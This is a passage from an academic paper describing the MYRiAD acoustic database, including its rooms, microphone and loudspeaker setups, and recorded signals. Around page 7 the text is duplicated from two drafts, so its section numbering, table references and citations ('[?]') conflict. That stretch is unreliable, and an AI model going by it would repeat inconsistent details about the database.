+ the AIL. MATLAB and Python scripts are included for accessing the signals as well as microphone and
22
+ loudspeaker coordinates. The database is publicly available at [1].
23
+ Keywords: Room Acoustic Database; Room Impulse Response; Cocktail Party Noise; Microphone Array;
24
+ Loudspeaker Array; Acoustic Signal Processing
25
+ 1 Introduction
26
+ Acoustic signal processing using multiple microphones
27
+ has received significant attention due to its fundamen-
28
+ tal role in a number of applications such as assistive
29
+ hearing with hearing aids or cochlear implants, tele-
30
+ conferencing, hands-free telephony, voice-controlled
31
+ devices, spatial audio reproduction, and sound-zoning,
32
+ just to name a few. Some of the specific tasks which
33
+ can be accomplished with acoustic signal processing
34
+ include speech enhancement and speech dereverbera-
35
+ tion [2–9], room parameter estimation [10], acoustic
36
+ echo and feedback cancellation [11, 12], source locali-
37
+ sation [3, 6, 13], audio source separation [8, 9], sound
38
+ field control [14, 15], and automatic speech recogni-
39
+ tion [16], all of which are pertinent to the aforemen-
40
+ tioned applications. One of the core phases in the de-
41
+ velopment of acoustic signal processing algorithms is
42
+ *Correspondence: thomas.dietzen@esat.kuleuven.be
43
+ 1Dept. of Electrical Engineering (ESAT), STADIUS Center for Dynamical
44
+ Systems, Signal Processing and Data Analytics, KU Leuven, Leuven,
45
+ Belgium
46
+ Full list of author information is available at the end of the article
47
+ that of the evaluation phase, where the performance
48
+ of a newly developed algorithm is compared to that of
49
+ existing algorithms in various acoustic environments
50
+ which are relevant for the application at hand. This is
51
+ clearly challenging because the laboratory conditions
52
+ under which the algorithm is evaluated rarely match
53
+ the real-world conditions where the algorithm must
54
+ perform. Additionally, recorded audio signals with the
55
+ target microphone configurations and specified acous-
56
+ tic scenarios may be unavailable, resulting in the use
57
+ of simulated data for evaluation. Although simulated
58
+ data can be useful in the evaluation of initial proof of
59
+ concept ideas, it does not necessarily provide accurate
60
+ indication whether the algorithm will perform well in
61
+ real-world conditions. In an effort to overcome these
62
+ challenges and to encourage the use of more realis-
63
+ tic data, several high-quality acoustic databases con-
64
+ taining room impulse responses (RIRs) [7, 10, 17–28],
65
+ speech [7, 10, 11, 16, 21, 23, 24], music [21], and babble
66
+ or cocktail party noise [23,29,30] have been developed
67
+ over the years, which have played an important role in
68
+ arXiv:2301.13057v1 [eess.AS] 30 Jan 2023
69
+
70
+ Dietzen et al.
71
+ Page 2 of 15
72
+ building confidence in the real-world performance of
73
+ various acoustic signal processing algorithms.
74
+ In this paper, we present another complementary
75
+ database of acoustic recordings from multiple micro-
76
+ phones in various acoustic scenarios, referred to as the
77
+ Multi-arraY Room Acoustic Database (MYRiAD). In
78
+ comparison to the existing databases, the MYRiAD
79
+ database is unique in its diversity of the employed mi-
80
+ crophone configurations suiting a wide range of appli-
81
+ cations, the acoustics of the recording spaces, and the
82
+ variety of signals contained in the database, which in-
83
+ cludes RIRs, recordings of reproduced speech, music,
84
+ and stationary noise, as well as recordings of live cock-
85
+ tail parties.
86
+ The database consists specifically of two different
87
+ microphone configurations used across two different
88
+ rooms. The first microphone configuration consists of
89
+ a dummy head (DH) with in-ear omnidirectional mi-
90
+ crophones, two behind-the-ear (BTE) pieces mounted
91
+ on the DH, each equipped with 2 omnidirectional mi-
92
+ crophones[1], as well as 5 external omnidirectional mi-
93
+ crophones (XMs) located at various distances and an-
94
+ gles from the DH. This microphone configuration will
95
+ be referred to as M1. The second microphone con-
96
+ figuration consists of two concentric circular micro-
97
+ phone arrays (CMAs) with in total 12 omnidirectional
98
+ microphones, which will be referred to as M2. The
99
+ two different rooms where audio recordings were made
100
+ are: (i) the SONORA Audio Laboratory [31] located
101
+ at the Depeartment of Electrical Engineering (ESAT-
102
+ STADIUS), KU Leuven, Belgium, which we will refer
103
+ to as the SAL, and (ii) the Alamire Interactive Lab-
104
+ oratory [31] located at the Park Abbey in Heverlee,
105
+ Belgium, referred to as the AIL. The main acoustical
106
+ difference between these two rooms is that the SAL
107
+ is significantly more reverberant than the AIL, with
108
+ reverberation times of 2.1 s and 0.5 s, respectively. In
109
+ the SAL, the microphone configuration M1 was used in
110
+ one position, and in the AIL, a combination of micro-
111
+ phone configurations M1 and M2 was used in two po-
112
+ sitions. In terms of sound generation, 10 different mov-
113
+ able loudspeakers were used as artificial sound sources
114
+ in the SAL, while the AIL has been equipped with an
115
+ array of 24 loudspeakers.
116
+ The following audio signals were played back through
117
+ the speakers and recorded by the microphones: expo-
118
+ nential sine sweeps used to compute RIRs [32] between
119
+ source and microphone positions, resulting in 110 RIRs
120
+ [1]These BTE pieces are commonly used for hearing
121
+ aids or cochlear implant devices. There is no addi-
122
+ tional signal processing done on the microphones in
123
+ these BTE pieces before arriving to the data acquisi-
124
+ tion system.
125
+ SAL
126
+ AIL
127
+ Figure 1: Fisheye view of the SAL and the AIL.
128
+ for the SAL and 1104 RIRs for the AIL, as well as
129
+ three male speeches [33], three female speeches [33], a
130
+ drum beat [34], a piano piece [35], and speech-shaped
131
+ stationary noise. Additionally, in both rooms, several
132
+ participants were invited to re-create a live cocktail
133
+ party scenario. The resulting noise from the different
134
+ cocktail parties held at each of the spaces was recorded
135
+ for both microphone configurations.
136
+ In total, the MYRiAD database contains 76 hours of
137
+ audio data sampled at 44.1 kHz in 24 bit, which results
138
+ in 36.2 GB. All computed RIRs and recorded signals
139
+ are available in the database and can be downloaded
140
+ [1]. MATLAB and Python scripts are included in the
141
+ database for accessing the signals and corresponding
142
+ microphone and loudspeaker coordinates.
143
+ The remaining sections of this paper provide a de-
144
+ tailed overview of the database and are organised as
145
+ follows. In Sec. 2, an overview of the two different
146
+ rooms, the SAL and the AIL, is presented. In Sec. 3,
147
+ a detailed description is given of the equipment used.
148
+ In Sec. 4, the microphone and loudspeaker configura-
149
+ tions within the two rooms are discussed. In Sec. 5, an
150
+ overview is given of the recorded signals, details of the
151
+
152
+ Dietzen et al.
153
+ Page 3 of 15
154
+ Table 1: Equipment used for creating the database.
155
+ Type
156
+ Product
157
+ Room/
158
+ Mic. Config.
159
+ Hardware
160
+ Reproduction
161
+ Loudspeakers
162
+ Genelec 8030 CP
163
+ SAL
164
+ Martin Audio CDD6
165
+ AIL
166
+ DA-converters
167
+ RME M-32 DA
168
+ SAL
169
+ Powersoft OTTOCANALI 4K4 DSP+D
170
+ AIL
171
+ Acquisition
172
+ Microphones
173
+ Neumann KU-100 DH
174
+ M1
175
+ BTE left/right-ear pieces from Cochlear
176
+ M1
177
+ AKG 97O
178
+ M1
179
+ AKG CK32
180
+ M1 & M2
181
+ DPA 4060
182
+ M2
183
+ AD-converters/pre-amplfiers
184
+ RME Micstasy
185
+ SAL & AIL
186
+ Proprietary pre-amp. for BTE microphones
187
+ SAL & AIL
188
+ Digital interface
189
+ RME Digiface USB audio interface
190
+ SAL
191
+ Ferrofish Verto 64
192
+ AIL
193
+ Apple iMac
194
+ SAL & AIL
195
+ Software
196
+ Reproduction/acquisition
197
+ Logic Pro X
198
+ SAL
199
+ Adobe Audition
200
+ AIL
201
+ Post-processing
202
+ MATLAB
203
+ Python
204
+ Figure 2: Dummy BTE pieces used for creating
205
+ the database. Each BTE piece consists of two
206
+ omnidirectional microphones as indicated by the
207
+ circles.
208
+ cocktail party, and the computed RIRs. In Sec. 6, prac-
209
+ tical instructions for using the database are provided,
210
+ along with a description of relevant MATLAB and
211
+ Python scripts, and some examples from the database
212
+ are illustrated. In Sec. 7, the database is briefly sum-
213
+ marised.
214
+ 2 Room description
215
+ In this section, we provide a brief overview on the char-
216
+ acteristics of the two recording rooms. The SAL is de-
217
+ scribed in Sec. 2.1 and the AIL is described in Sec.
218
+ 2.2.
219
+ 2.1 SONORA Audio Laboratory (SAL)
220
+ The SAL [31] is located at the Department of Electri-
221
+ cal Engineering (ESAT-STADIUS), KU Leuven, Hev-
222
+ erlee, Belgium. Fig. 1 shows a fisheye view and Fig. 6
223
+ shows a floor plan of the L-shaped SAL with approx-
224
+ imate dimensions. The height of the room is 3.75 m,
225
+ yielding a volume of approximately 102 m3. The walls
226
+ and ceiling are made of plasterboard covering mineral
227
+ wool, while the floor is made of concrete covered with
228
+ vinyl. Two windows, each of 4 m2 are located on one
229
+ side of the room. Adjacent to the recording room, sep-
230
+ arated by glass of area 6.5 m2, is the control room,
231
+ where all the acquisition equipment and a computer
232
+ are located. From the RIRs measured in the SAL, we
233
+ estimated the reverberation time RT60 to be 2.1 s as
234
+ described in Sec. 6.4. Details on the audio hardware
235
+ used in the SAL are given in Sec. 3, while the micro-
236
+ phone and loudspeaker configuration and placement
237
+ are described in Sec. 4.1.1, Sec. 4.2.1, and Sec. 4.3.
238
+ 2.2 Alamire Interactive Laboratory (AIL)
239
+ The AIL [31] is located in a historic gate building, the
240
+ Saint Norbert’s gate of the Park Abbey in Heverlee,
241
+ Belgium. Fig. 1 shows a fisheye view and Fig. 6 shows
242
+
243
+ QDietzen et al.
244
+ Page 4 of 15
245
+ 1 m
246
+ 2 m
247
+ �90�
248
+ �75�
249
+ �60�
250
+ �45�
251
+ �30�
252
+ �15�
253
+ 0�
254
+ 15�
255
+ 30�
256
+ 45�
257
+ 60�
258
+ 75�
259
+ 90�
260
+ BTERF
261
+ BTERB
262
+ BTELF
263
+ BTELB
264
+ DHR
265
+ DHL
266
+ S0 1
267
+ S60 1
268
+ S30 1
269
+ S90 1
270
+ S-30 1
271
+ S-60 1
272
+ S-90 1
273
+ S45 2
274
+ S-45 2
275
+ S0 2
276
+ XM3
277
+ XM4
278
+ XM5
279
+ XM2
280
+ XM1
281
+ M1
282
+ LS-SAL
283
+ Figure 3: Plan view of the M1 microphone configuration and the LS-SAL loudspeaker configuration. A descrip-
284
+ tion of the microphone and loudspeaker labels is given in Table 2. The radial grid spacing of the polar plot is
285
+ 0.25 m. The DH is placed at a height of approximately 1.3 m ear level from the floor and all XMs are placed at a
286
+ height approximately 1 m from the floor. The trapezoidal shape is used to represent the M1 microphone config-
287
+ uration in the floor plans of Fig. 6. For extracting the coordinates of the microphone and loudspeaker positions,
288
+ the MATLAB or Python scripts discussed in Sec. 6.2 should be used.
289
+ a floor plan of the room. Apart from a staircase lead-
290
+ ing to a floor above, the room is approximately shoe-
291
+ box shaped with 6.4 m width, 6.9 m depth, and 4.7 m
292
+ height, yielding a volume of approximately 208 m3.
293
+ The floor and ceiling are made of wood. The room is
294
+ closed by thin line plastered brick walls with two win-
295
+ dows each to the front and the back of about 3.3 m2
296
+ each, and wide passages to adjacent rooms, with one
297
+ of them closed by a glass door. These passages were
298
+ closed off with curtains during recording, except for a
299
+ part of the cocktail party noise, cf. Sec. 5.3. The hous-
300
+ ing of the staircase is plastered, the stairs are wooden,
301
+ and the railing is made of glass. From the RIRs mea-
302
+ sured in the AIL, the reverberation time RT60 is esti-
303
+ mated to be 0.5 s, cf. Sec 6.4. The AIL is equipped with
304
+ a permanent, fixed array of 24 loudspeakers for spatial
305
+ audio reproduction as shown in Fig. 1. Further details
306
+ on the audio hardware used in the AIL are given in
307
+ Sec. 3, while the microphone and loudspeaker configu-
308
+ ration and placement are described in Sec. 4.1.1, Sec.
309
+ 4.1.2, Sec. 4.2.2, and Sec. 4.3.
310
+ 3 Recording equipment
311
+ A list of the recording and processing equipment used
312
+ to create the database is shown in Table 1. In regards
313
+ to the microphones, the DH contains 2 in-ear omni-
314
+ directional microphones (one for each ear) and the
315
+ two BTE pieces (one for each ear) are each equipped
316
+ with 2 omnidirectional microphones. The BTE pieces
317
+ and their proprietary pre-amplifier were provided by
318
+ Cochlear Ltd. and shown in Fig. 2. The specific loud-
319
+ speaker and microphone configurations used for the
320
+ various recordings in the database will be outlined in
321
+ Sec. 4, and naming conventions of files will be defined
322
+ in Sec. 6.
323
+ The recording chains were built as follows. As the
324
+ digital audio workstations for sending and acquiring
325
+ the signals, Logic Pro X and Adobe Audition on an
326
+ iMac were used in the SAL and the AIL, respectively.
327
+ In the SAL, the signals were sent from Logic Pro X via
328
+ USB to the RME Digiface, then to the RME M-32 DA
329
+ using the ADAT protocol, and finally to the respective
330
+ Genelec 8030 CP loudspeakers. In the AIL, the signals
331
+ were sent from Adobe Audition via the DANTE pro-
332
+ tocol to the Powersoft OTTOCANALI 4K4 DSP+D,
333
+ and finally to the Martin Audio CDD6 loudspeakers.
334
+ In both rooms, all microphone signals were sent to an
335
+ RME Micstasy (except for the BTE microphone sig-
336
+ nals which were firstly routed to the proprietary pre-
337
+ amplifier) and converted to ADAT. In the SAL, the
338
+ ADAT signals were sent to the RME Digiface and fi-
339
+ nally recorded on Logic Pro X, whereas in the AIL,
340
+ the ADAT signals were sent to the Ferrofish Verto
341
+ 64 and via DANTE to Adobe Audition. The various
342
+ types of recorded signals are outlined in Sec. 5. For
343
+ post-processing (such as RIR computation, cf. Sec. 5),
344
+ MATLAB and Python were used.
345
+
346
+ Dietzen et al.
347
+ Page 5 of 15
348
+ 4 Microphone and loudspeaker
349
+ configurations
350
+ This section describes the microphone configurations
351
+ in Sec. 4.1, the loudspeaker configurations in Sec. 4.2,
352
+ and the placement of these configurations within the
353
+ SAL and AIL in Sec. 4.3. The exact coordinates of the
354
+ loudspeaker and microphone positions within the SAL
355
+ and AIL from the various configurations can be loaded
356
+ from the database, but the details of this procedure
357
+ will be elaborated upon in Sec. 6.
358
+ 4.1 Microphone configurations
359
+ 4.1.1 M1
360
+ The first microphone configuration, M1, consists of
361
+ the in-ear microphones from the DH, the microphones
362
+ from the BTE pieces, three AKG 97O microphones,
363
+ and two AKG CK32 microphones. As the AKG 97O
364
+ and AKG CK32 microphones are not mounted on the
365
+ DH, they are considered to be ‘external’ in relation
366
+ to the DH, and hence will be referred to as external
367
+ microphones (XMs). This M1 configuration was used
368
+ in both the SAL and the AIL, cf. Sec. 4.3. Fig. 3 de-
369
+ picts the plan view of the measurement configuration
370
+ of the loudspeakers and microphones used for the au-
371
+ dio recordings made in the SAL. For now, however, we
372
+ will focus only on the trapezoidal shape enclosing the
373
+ microphones, which is a depiction of the M1 configu-
374
+ ration. A description of the corresponding microphone
375
+ labels is given in Table 2.
376
+ For this M1 configuration, the DH is placed at a
377
+ height of approximately 1.3 m ear level from the floor.
378
+ Each of the BTE pieces is mounted on the DH as shown
379
+ in Fig. 2. The XMs are placed within a radius of 1 m
380
+ from the DH as shown in Fig. 3. XM1, XM2, and XM3
381
+ are AKG 97O microphones, while XM4 and XM5 are
382
+ AKG CK32 microphones. The XMs are all positioned
383
+ at 1 m above the floor.
384
+ 4.1.2 M2
385
+ The second microphone configuration, M2, consists of
386
+ two concentric circular microphone arrays composed
387
+ of 4 DPA 4060 and 8 AKG CK 32 microphones. Fig.
388
+ 4 shows a plan view of the M2 configuration, and a
389
+ description of the microphone labels is given in Table
390
+ 2. The inner circular microphone array has a radius
391
+ of 10 cm and consists of 4 equidistantly placed DPA
392
+ 4060 microphones. The outer circular microphone ar-
393
+ ray has a radius of 20 cm and consists of 8 equidis-
394
+ tantly placed AKG CK 32 microphones. The micro-
395
+ phones are all placed at a height of 1 m above the floor,
396
+ centred around the stand of the DH of the M1 config-
397
+ uration. This M2 configuration was used at two differ-
398
+ ent positions within the AIL, always in combination
399
+ with M1 as depicted in Fig. 6. It should be noted that
400
+ �90�
401
+ �45�
402
+ 0�
403
+ 45�
404
+ 90�
405
+ 135�
406
+ 180�
407
+ �135�
408
+ CMA20 0
409
+ CMA20 90
410
+ CMA20 180
411
+ CMA20 -90
412
+ CMA20 45
413
+ CMA20 135
414
+ CMA20 -135
415
+ CMA20 -45
416
+ CMA10 0
417
+ CMA10 90
418
+ CMA10 180
419
+ CMA10 -90
420
+ M2
421
+ 10 cm
422
+ 20 cm
423
+ Figure 4: Plan view of the M2 microphone con-
424
+ figuration. A description of the microphone labels
425
+ is given in Table 2. The radial grid spacing of
426
+ the polar plot is 0.1 m. DPA 4060 microphones
427
+ are used for the inner circular microphone ar-
428
+ ray and AKG CK 32 microphones are used for
429
+ the outer circular microphone array. The circle
430
+ drawn around the microphones represents the M2
431
+ microphone configuration in the floor plans in
432
+ Fig. 6. For extracting more precise coordinates
433
+ of the microphone and loudspeaker positions, the
434
+ MATLAB or Python scripts discussed in Sec. 6.2
435
+ should be used.
436
+ since M2 was used in combination with M1, it is also
437
+ possible to define arrays that contain microphones of
438
+ both configurations, such as a linear array composed of
439
+ CMA20 180, CMA10 180, XM1, CMA10 0, CMA20 0,
440
+ XM2, and XM3.
441
+ 4.2 Loudspeaker configurations
442
+ 4.2.1 LS-SAL
443
+ The loudspeaker configuration LS-SAL as the name
444
+ suggests is used in the SAL only. It is defined rela-
445
+ tive to the M1 microphone configuration, and consists
446
+ of 10 loudspeakers. The loudspeakers are positioned
447
+ at various spatial locations at a height such that the
448
+ centre of each of the woofers is approximately 1.3 m
449
+ above the floor. Fig. 3 is a plan view of this LS-SAL
450
+ loudspeaker configuration along with the M1 micro-
451
+ phone configuration. A description of the loudspeaker
452
+ labels is also provided in Table 2. During recordings,
453
+ the loudspeaker S0 1 was removed before recording the
454
+ signals for the loudspeaker S0 2 so that there was a di-
455
+ rect line of sight from the latter to the DH.
456
+
457
+ Dietzen et al.
458
+ Page 6 of 15
459
+ Table 2: Microphone and loudspeaker labels.
460
+ type
461
+ label
462
+ description
463
+ microphones
464
+ dummy head
465
+ DHL
466
+ left ear
467
+ DHR
468
+ right ear
469
+ BTE pieces
470
+ BTELF
471
+ left ear, front
472
+ BTELB
473
+ left ear, back
474
+ BTERF
475
+ right ear, front
476
+ BTERB
477
+ right ear, back
478
+ external microphone
479
+ XM[i]
480
+ with index [i] as depicted in Fig. 3
481
+ [i] ∈ {1, 2, . . . , 5}
482
+ circular microphone array
483
+ CMA[r] [a]
484
+ at [r]cm radius and an angle of [a]◦ as depicted in Fig. 4
485
+ [r] ∈ {10, 20}
486
+ [a] ∈ {-135, -90, . . . , 180}
487
+ room
488
+ label
489
+ description
490
+ loudspeakers
491
+ SAL
492
+ S[a] [d]
493
+ at angle of [a]◦ and in [d]m distance as depicted in Fig. 3
494
+ [a] ∈ {-90, -60, -45, -30, 0, 30, 45, 60, 90}
495
+ [d] ∈ {1, 2}
496
+ AIL
497
+ S[l][i]
498
+ at height level [l] with index [i] as depicted in Fig. 5
499
+ [l] ∈ {L, U, T} (indicating lower, upper, and top level)
500
+ [i] ∈ {1, 2, . . . , 12}
501
+ 4.2.2 LS-AIL
502
+ The loudspeaker configuration LS-AIL is a 24-loud-
503
+ speaker array, permanently installed in the AIL, cf.
504
+ Fig. 1, which is typically used for spatial sound repro-
505
+ duction. Fig. 5 shows the geometry of the loudspeaker
506
+ array. The loudspeakers are labeled as described in Fig.
507
+ 5 and Table 2. The width and depth of the array are
508
+ approximately 5.6 m and 4.85 m, and the loudspeakers
509
+ are arranged in three groups of different height lev-
510
+ els, referred to as lower, upper, and top level. The
511
+ lower level consists of 8 speakers located around the
512
+ room along the walls at about 1.5 m height, the upper
513
+ level containing 12 speakers is located above at about
514
+ 3.3 m height, and the top level containing 4 speakers
515
+ is located more centrally at about 4.1 m height. Note
516
+ that for the sake of simplicity, the presented locations
517
+ are only approximate. Using measurements of the dis-
518
+ tances between the speakers and a set of four refer-
519
+ ence points on the floor with known coordinates, the
520
+ exact coordinates of the loudspeakers have been es-
521
+ timated based on the theory on Euclidean distance
522
+ matrices [36]. All microphone and loudspeaker coordi-
523
+ nates can be loaded from the database as discussed in
524
+ Sec. 6.2.
525
+ 4.3 Microphone and loudspeaker configuration
526
+ placement
527
+ Fig. 6 illustrates the placement of the M1 microphone
528
+ configuration as well as the LS-SAL loudspeaker con-
529
+ figuration within the SAL at a recording position near
530
+ the corner of the L-shaped room.
531
+ Fig. 6 shows a floor plan of the setups M1 and M2
532
+ within the AIL, together with the lower speakers of
533
+ the LS-AIL loudspeaker array. As can be seen, there
534
+ are two recording positions in the AIL, referred to as
535
+ P1 and P2, with the DH facing the speakers SU6 and
536
+ SU7, located roughly below ST2 and ST1 (not shown
537
+ in the figure), respectively. In both recording positions,
538
+ both microphone configurations M1 and M2 are used,
539
+ with the stand of the DH of M1 being the center of
540
+ the circular microphone arrays of M2. Fig. 7 shows a
541
+ combination of M1 and M2 as used in position P2.
542
+ The coordinates of all speakers and microphones in
543
+ both rooms can be loaded from the database using
544
+ MATLAB or Python, cf. Sec 6.2.
545
+ 5 Recorded signals
546
+ The MYRiAD database contains 76 hours of audio
547
+ data and has a size of 36.2 GB. All microphone signals
548
+ in the database are provided at a sampling frequency
549
+ of 44.1 kHz with a 24 bit resolution. A summary of the
550
+ signals recorded and computed, along with the quan-
551
+ tity of each (i.e. the number of different instances of
552
+
553
+ Dietzen et al.
554
+ Page 7 of 15
555
+ Dietzen et al.
556
+ Page 7 of 15
557
+ 0
558
+ 1.5
559
+ 3.3
560
+ 4.1
561
+ SL1
562
+ SL2
563
+ SL3
564
+ SL4
565
+ SL5
566
+ SL6
567
+ SL7
568
+ SL8
569
+ SU1
570
+ SU2
571
+ SU3
572
+ SU4
573
+ SU5
574
+ SU6
575
+ SU7
576
+ SU8
577
+ SU9
578
+ SU10
579
+ SU11
580
+ SU12
581
+ ST1
582
+ ST2
583
+ ST3
584
+ ST4
585
+ 1.75
586
+ 2.1
587
+ 1.75
588
+ 1.5
589
+ 1.85
590
+ 1.5
591
+ Width distance (m)
592
+ Depth distance (m)
593
+ Height (m)
594
+ Figure 5: View of the LS-AIL loudspeaker array in the AIL. A description of the loudspeaker labels
595
+ is given in Table 2. The speakers are organized in three di↵erent height levels of about 1.5 m (lower
596
+ level), 3.3 m (upper level), and 4.1 m (top level) above the floor. The axes limits coincide with the
597
+ boundaries of the approximately shoe-boxed shaped room, cf. Sec. 2.2. On the horizontal axes, the
598
+ approximate distance between neighbouring speakers is indicated. The given dimensions are of indica-
599
+ tive nature and not exact; for extracting the coordinates of the microphone and loudspeaker positions,
600
+ the MATLAB or Python scripts discussed in Sec. 6.2 should be used.
601
+ 5 Recorded signals
602
+ The MYRiAD database contains 76 hours of audio
603
+ data and has a size of 36.2 GB. All microphone signals
604
+ in the database are provided at a sampling frequency
605
+ of 44.1 kHz with a 24 bit resolution. A summary of the
606
+ signals recorded and computed, along with the quan-
607
+ tity of each (i.e. the number of di↵erent instances of
608
+ that type of signal), their duration, their source, their
609
+ acquisition method (i.e. how the signals were gener-
610
+ ated), the employed loudspeakers, and a signal label
611
+ is provided in Table 5. In the remainder of this sec-
612
+ tion, we discuss in more detail the recorded speech,
613
+ noise and music signals in Sec. 5.1, the recorded cock-
614
+ tail party in Sec. 5.2, and the RIR measurements in
615
+ Sec. 5.3.
616
+ 5.1 Speech, noise, music
617
+ Speech, stationary noise, and music signals were played
618
+ through the loudspeakers indicated in Table 5 and
619
+ recorded by all microphones. Three male and three
620
+ female speech segments were chosen randomly from
621
+ the Centre for Speech Technology Research (CSTR)
622
+ Voice Cloning Toolkit (VCTK) corpus [?]. The sta-
623
+ tionary noise source signal has a speech-shaped spec-
624
+ trum and was generated in MATLAB based on speech
625
+ spectra from the VCTK corpus. The drum piece was
626
+ taken from the studio recording sessions in [?]. The
627
+ piano piece is track 60 (Schubert) from the European
628
+ Broadcast Union Sound Quality Assessment Material
629
+ Recordings for Subjective Tests (EBU SQAM) [?]. In
630
+ the AIL, the sides of the room were closed o↵ with
631
+ curtains during recording. These signals were acquired
632
+ for all loudspeakers in the SAL, but only for the lower
633
+ loudspeaker level in the AIL, that is SL1 to SL8 (in
634
+ contrast to the RIRs, which were computed for all pos-
635
+ sible loudspeaker-microphone combinations, cf. Sec.
636
+ 5.3). The recorded signals were post-processed to re-
637
+ move the input-output delay caused by the recording
638
+ hardware. Both the source signals and the recorded
639
+ signals are included in the database.
640
+ 5.2 Cocktail party
641
+ In addition to the aforementioned signals, a cocktail
642
+ party scenario was re-created and recorded in both the
643
+ SAL and the AIL. All participants gave informed con-
644
+ sent. They were instructed to stay outside of a 1 m
645
+ circumference around the DH in both rooms and peri-
646
+ odically move around in a random manner engaging in
647
+ conversation. Snacks and beverages in glasses were also
648
+ LS-AIL
649
+ Figure 5: View of the LS-AIL loudspeaker array in the AIL. A description of the loudspeaker labels is given
650
+ in Table 2. The speakers are organized in three different height levels of about 1.5 m (lower level), 3.3 m (upper
651
+ level), and 4.1 m (top level) above the floor. The axes limits coincide with the boundaries of the approximately
652
+ shoe-boxed shaped room, cf. Sec. 2.2. On the horizontal axes, the approximate distance between neighbouring
653
+ speakers is indicated. The given dimensions are of indicative nature and not exact; for extracting the coordinates
654
+ of the microphone and loudspeaker positions, the MATLAB or Python scripts discussed in Sec. 6.2 should be
655
+ used.
656
+ that type of signal), their duration, their source, their
657
+ acquisition method (i.e. how the signals were gener-
658
+ ated), the employed loudspeakers, and a signal label is
659
+ provided in Table 3. In the remainder of this section,
660
+ we discuss in more detail the RIR measurements in
661
+ Sec. 5.1, the recorded speech, noise and music signals
662
+ in Sec. 5.2, and the recorded cocktail party in Sec. 5.3.
663
+ 5.1 Room impulse responses
664
+ The database includes in total 110 RIRs from the SAL
665
+ and 1104 RIRs from the AIL. To obtain the RIRs,
666
+ two exponential sine sweep signals were played and
667
+ recorded for each loudspeaker-microphone combina-
668
+ tion. In the AIL, the sides of the room were closed
669
+ off with curtains during the recording. From these sine
670
+ sweeps, the RIRs were computed by cross-correlation[2]
671
+ according to the procedure detailed in [32]. From each
672
+ pair of recorded sine sweeps, one of them was selected
673
+ for RIR estimation by visual inspection of the spec-
674
+ trograms (more specifically, spectrograms containing
675
+ any type of non-stationary noise were discarded). In
676
+ [2]It should be noted that the estimated impulse re-
677
+ sponses also include some characteristics of the record-
678
+ ing hardware. Consequently these impulse responses
679
+ are, in a strict sense, not the true RIRs which rep-
680
+ resent the characteristics of the room only. Neverthe-
681
+ less these impulse responses are designated as RIRs for
682
+ simplicity.
683
+ order to obtain as clean as possible RIRs, some of
684
+ the recorded sine sweeps were post-processed as to
685
+ suppress low-level (stationary) harmonic noise compo-
686
+ nents produced by the recording equipment. In this
687
+ post-processing procedure, frequency bins containing
688
+ harmonic noise components were identified during si-
689
+ lence by comparing their magnitude to the median
690
+ magnitude of neighbouring frequency bins. If the dif-
691
+ ference was above the threshold of 4 dB, a Wiener filter
692
+ [2] was applied in that frequency bin. The recorded sig-
693
+ nals were further post-processed to remove the input-
694
+ output delay caused by the recording hardware.
695
+ 5.2 Speech, noise, music
696
+ Speech, stationary noise, and music signals were played
697
+ through the loudspeakers indicated in Table 3 and
698
+ recorded by all microphones. Three male and three
699
+ female speech segments were chosen randomly from
700
+ the Centre for Speech Technology Research (CSTR)
701
+ Voice Cloning Toolkit (VCTK) corpus [33]. The sta-
702
+ tionary noise source signal has a speech-shaped spec-
703
+ trum and was generated in MATLAB based on speech
704
+ spectra from the VCTK corpus. The drum piece was
705
+ taken from the studio recording sessions in [34]. The
706
+ piano piece is track 60 (Schubert) from the European
707
+ Broadcast Union Sound Quality Assessment Material
708
+ Recordings for Subjective Tests (EBU SQAM) [35].
709
+ In the AIL, the sides of the room were closed off
710
+
711
+ Dietzen et al.
712
+ Page 8 of 15
713
+ 5.05 m
714
+ 6.40 m
715
+ 3.05 m
716
+ 3.40 m
717
+ Door
718
+ Window
719
+ Window
720
+ Glass separation
721
+ to control room
722
+ Control
723
+ Room
724
+ M1
725
+ S0 1
726
+ S60 1
727
+ S30 1
728
+ S90 1
729
+ S-30 1
730
+ S-60 1
731
+ S-90 1
732
+ S45 2
733
+ S-45 2
734
+ S0 2
735
+ 6.40 m
736
+ 6.90 m
737
+ P1
738
+ SL4
739
+ SL3
740
+ SL2
741
+ SL1
742
+ SL5
743
+ SL6
744
+ SL7
745
+ SL8
746
+ M1
747
+ M1
748
+ M2
749
+ M2
750
+ Window
751
+ Window
752
+ Window
753
+ Staircase
754
+ Curtains
755
+ Curtains
756
+ P2
757
+ AIL
758
+ SAL
759
+ Figure 6: Microphone and loudspeaker configuration placement. (Left) Placement of the M1 microphone config-
760
+ uration and the LS-SAL loudspeaker configuration within the SAL. (Right) Placement of the M1 and M2 micro-
761
+ phone configurations in P1 and P2 as well as the lower level of the LS-AIL loudspeaker configuration within the
762
+ AIL. Details of the M1 and M2 microphone configurations and the LS-SAL and LS-AIL loudspeaker configura-
763
+ tion can be seen in Fig. 3, Fig. 4, and Fig. 5. For extracting the coordinates of the microphone and loudspeaker
764
+ positions, the MATLAB or Python scripts discussed in Sec. 6.2 should be used.
765
+ with curtains during recording. These signals were ac-
766
+ quired for all loudspeakers in the SAL, but only for
767
+ the lower loudspeaker level in the AIL, that is SL1 to
768
+ SL8 (in contrast to the RIRs, which were computed for
769
+ all possible loudspeaker-microphone combinations, cf.
770
+ Sec. 5.1). The recorded signals were post-processed to
771
+ remove the input-output delay caused by the record-
772
+ ing hardware. For the signals recorded in the SAL, a
773
+ slow phase drift was observed between the recorded
774
+ data and simulated data obtained from convolving the
775
+ estimated RIR with the source signal, cf. Sec. 6.3. This
776
+ phase drift can be associated to hardware limitations
777
+ in the recording setup and has been compensated for
778
+ by time-shifting some of the recorded signals[3] such
779
+ as to minimize the error between the recorded and the
780
+ convolved data. For the signals recorded in the AIL,
781
+ no phase drift was observed. Both the source signals
782
+ and the recorded signals are included in the database.
783
+ [3]Only a minority of the recorded signals required a
784
+ shift of at most 2 samples.
785
+ 5.3 Cocktail party
786
+ In addition to the aforementioned signals, a cocktail
787
+ party scenario was re-created and recorded in both the
788
+ SAL and the AIL. All participants gave informed con-
789
+ sent. They were instructed to stay outside of a 1 m
790
+ circumference around the DH in both rooms and pe-
791
+ riodically move around in a random manner engaging
792
+ in conversation. Snacks and beverages in glasses were
793
+ also served to the participants during the recordings.
794
+ For the SAL cocktail party, at any given time, there
795
+ were at least 15 people present in the room, whereas
796
+ for the AIL cocktail party, there were at least 10 and
797
+ at most 14 people present. In the SAL, the microphone
798
+ configuration M1 located as shown in Fig. 6 was used
799
+ (the loudspeakers were removed from the room). In
800
